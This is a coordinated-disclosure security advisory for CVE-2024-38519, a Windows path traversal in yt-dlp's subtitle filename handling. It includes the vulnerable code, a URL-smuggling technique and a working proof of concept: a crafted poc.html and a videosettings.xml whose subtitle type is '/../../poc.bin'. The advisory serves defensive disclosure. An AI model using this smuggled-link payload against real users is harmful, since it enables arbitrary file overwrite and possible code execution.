Coordinated Disclosure Timeline
- 2024-05-24: The report was sent to the maintainers through private vulnerability reporting.
- 2024-05-24: The report was accepted.
- 2024-07-01: v2024.07.01 with the fix was released.
- 2024-07-01: The advisory was published.
Summary
yt-dlp doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.
Project
yt-dlp
Tested Version
Details
Path traversal saving subtitles (GHSL-2024-090)
yt-dlp is capable of downloading not only video files, but also accompanying subtitles if the user specifies the --write-subs, --write-auto-subs, --all-subs or --write-srt option. Each supported video website has a dedicated extractor. Some extractors provide only the URLs of subtitles, and yt-dlp resolves their extension from the URL path. Others provide the URLs and the subtitle extensions explicitly. Of the latter, some validate the extracted subtitle extension, but others trust the extracted value blindly.
yt-dlp honors the provided extension name and uses it to build the name of the output file for subtitles in [1]. There, filename is the generated name for the video file, sub_lang is en by default, sub_format is the extracted subtitle extension, and info_dict.get('ext') contains the video file extension that subtitles_filename replaces with sub_format. The subtitle is written as a binary file in [2]. If the user doesn’t override the default output file template %(title)s [%(id)s].%(ext)s, then sub_filename is formatted as %(title)s [%(id)s].%(sub_lang)s.%(sub_format)s. The path traversal injection in sub_format doesn’t work on Linux because Linux doesn’t accept paths like not_existing_folder/../../file, but it does work on Windows.
for sub_lang, sub_info in subtitles.items():
    sub_format = sub_info['ext']
    sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext'))  # <------------- [1]
    sub_filename_final = subtitles_filename(sub_filename_base, sub_lang, sub_format, info_dict.get('ext'))
    existing_sub = self.existing_file((sub_filename_final, sub_filename))
    if existing_sub:
        self.to_screen(f'[info] Video subtitle {sub_lang}.{sub_format} is already present')
        sub_info['filepath'] = existing_sub
        ret.append((existing_sub, sub_filename_final))
        continue
    self.to_screen(f'[info] Writing video subtitles to: {sub_filename}')
    #...
    try:
        sub_copy = sub_info.copy()
        sub_copy.setdefault('http_headers', info_dict.get('http_headers'))
        self.dl(sub_filename, sub_copy, subtitle=True)  # <------------- [2]
        sub_info['filepath'] = sub_filename
        ret.append((sub_filename, sub_filename_final))
    #...
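The platform difference can be illustrated with a minimal sketch. The function build_subtitle_name is a hypothetical, simplified stand-in for the filename helper (it is not yt-dlp's code), and the video title is made up. The sketch uses Python's ntpath module to show how a Windows-style lexical normalization would resolve the crafted name. That Windows collapses the path this way before touching the file system is an assumption, although it is consistent with the behavior described above.

```python
import ntpath
import posixpath


def build_subtitle_name(video_filename, sub_lang, sub_format, video_ext):
    """Hypothetical stand-in: swap the video extension for '<lang>.<format>'."""
    stem, real_ext = posixpath.splitext(video_filename)
    # Only strip the extension when it is the one we expect.
    base = stem if real_ext[1:] == video_ext else video_filename
    return f"{base}.{sub_lang}.{sub_format}"


benign = build_subtitle_name("Title [id].mp4", "en", "vtt", "mp4")
crafted = build_subtitle_name("Title [id].mp4", "en", "/../../poc.bin", "mp4")

# Lexical normalization with Windows rules cancels the non-existent
# "Title [id].en." component against the first "..", so the remaining
# ".." points one level above the working directory.
crafted_windows_view = ntpath.normpath(crafted)

print(benign)
print(crafted)
print(crafted_windows_view)
```

On Linux the same string is resolved component by component, so the lookup fails as soon as the non-existent directory Title [id].en. is reached.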
Exploitability and Proof of Concept (PoC)
Intentionally crafted subtitle extension names in a supported website (such as youtube.com or bbc.co.uk) are not in the threat model of the report. However, it is possible that such a website is compromised at some point: an XSS or SQL injection would allow the attacker to exploit a specific yt-dlp extractor. The attacker would then need to wait for any yt-dlp user, or trick a specific yt-dlp user, to download the video with subtitles. Other yt-dlp features, however, allow exploitation without compromising the video hosting website:
- URL smuggling. Some yt-dlp extractors attempt to get additional information from the URL part that comes after # (the fragment). The fragment is URL decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1], retrieves base_url from it [2] and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked into running, for example,
    yt-dlp --write-subs https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D
  it will use an XML file from an attacker-controlled site, site.com in this case, to extract subtitles and video files.
    url, smuggled_data = unsmuggle_url(url, {})  # <------------- [1]
    mobj = self._match_valid_url(url)
    course_id = mobj.group('course_id')
    video_id = mobj.group('id')
    base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id)  # <------------- [2]
    settings = self._download_xml(
        '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id),  # <------------- [3]
        video_id, 'Downloading video settings XML')
- Generic extractor. yt-dlp allows you to download videos from arbitrary pages that embed supported video websites. This allows the attacker to hide the smuggled fragment from a yt-dlp user. The user needs to run only: yt-dlp --write-subs https://attacker.com/poc.html
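The decoding of a smuggled fragment can be sketched with the standard library alone. The helper decode_smuggled_fragment is hypothetical and only approximates what the text says the fragment parsing does (URL decode, then parse as JSON); it is not yt-dlp's unsmuggle_url. The video identifier is assumed to be the value of the l= query parameter, which matches the folder name used in the PoC.

```python
import json
from urllib.parse import parse_qs


def decode_smuggled_fragment(url):
    """Hypothetical helper: split off the fragment and parse its JSON payload."""
    base, _, fragment = url.rpartition("#")
    # parse_qs URL-decodes the value, turning '+' into a space.
    payload = parse_qs(fragment)["__youtubedl_smuggle"][0]
    return base, json.loads(payload)


link = (
    "https://mva.microsoft.com/en-US/training-courses/"
    "microsoft-azure-fundamentals-virtual-machines-11788"
    "?l=gfVXISmEB_6804984382"
    "#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D"
)
page_url, smuggled = decode_smuggled_fragment(link)

# Assumption: the extractor takes the video id from the l= parameter.
video_id = "gfVXISmEB_6804984382"
settings_url = "%s/content/content_%s/videosettings.xml?v=1" % (
    smuggled["base_url"], video_id)

print(smuggled)
print(settings_url)
```

The resulting settings URL points at the host named in the fragment, not at the site named in the visible part of the link.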
For a PoC:
- Create a folder with the following poc.html:
<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">
- Create two subfolders content/content_gfVXISmEB_6804984382 in the folder where poc.html resides.
- Create the following videosettings.xml in the content_gfVXISmEB_6804984382 folder:
<videoSettings version="1.5">
<PlaylistItems>
<PlaylistItem>
<MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
<MediaSource />
<Title>01 | Introduction</Title>
<MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
<ThumbSource />
</PlaylistItem>
</PlaylistItems>
</videoSettings>
- Create an arbitrary file named subtitles in the content_gfVXISmEB_6804984382 folder.
- Host the folder with poc.html with python3 -m http.server
- On Windows, run yt-dlp --write-subs http://127.0.0.1:8000/poc.html
yt-dlp creates a file poc.bin one level up from the current folder as long as the running user has sufficient permissions.
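To make the data flow in the PoC concrete, the following sketch parses a trimmed copy of the videosettings.xml above and collects subtitle entries. It is an illustration, not the extractor's code: treating the type attribute of MarkerResourceSource as the subtitle extension is an assumption inferred from where the PoC places its payload, and the dictionary keys are chosen to match the sub_info['ext'] access shown earlier.

```python
import xml.etree.ElementTree as ET

# Trimmed copy of the PoC settings file (media sources omitted).
SETTINGS_XML = """
<videoSettings version="1.5">
  <PlaylistItems>
    <PlaylistItem>
      <Title>01 | Introduction</Title>
      <MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
    </PlaylistItem>
  </PlaylistItems>
</videoSettings>
"""

base_url = "http://127.0.0.1:8000"
root = ET.fromstring(SETTINGS_XML)

subtitles = []
for source in root.iter("MarkerResourceSource"):
    if not source.text:
        continue
    subtitles.append({
        "url": f"{base_url}/{source.text}",
        # Assumption: the attribute value is passed on unvalidated.
        "ext": source.get("type"),
    })

print(subtitles)
```

Nothing between the XML attribute and the output filename constrains the value, which is why the traversal sequence survives intact.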
Impact
This issue may lead to unauthorized file system modification and later may lead to remote code execution if an executable file is overwritten.
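One common way to guard against this class of issue is to accept only known extensions before building a filename. The sketch below is a generic illustration and not the fix shipped in v2024.07.01, which this advisory does not describe. The allowlist contents and the function name is_safe_subtitle_ext are hypothetical.

```python
# Hypothetical allowlist; a real project would choose its own set.
ALLOWED_SUBTITLE_EXTS = {"vtt", "srt", "ass", "ttml"}


def is_safe_subtitle_ext(ext):
    """Return True only for extensions on the allowlist (case-insensitive)."""
    return isinstance(ext, str) and ext.lower() in ALLOWED_SUBTITLE_EXTS


for candidate in ("vtt", "SRT", "/../../poc.bin", None):
    print(repr(candidate), is_safe_subtitle_ext(candidate))
```

An allowlist rejects path separators and dot segments as a side effect, without having to enumerate every dangerous character.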
CVE
- CVE-2024-38519
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2024-090 in any communication regarding this issue.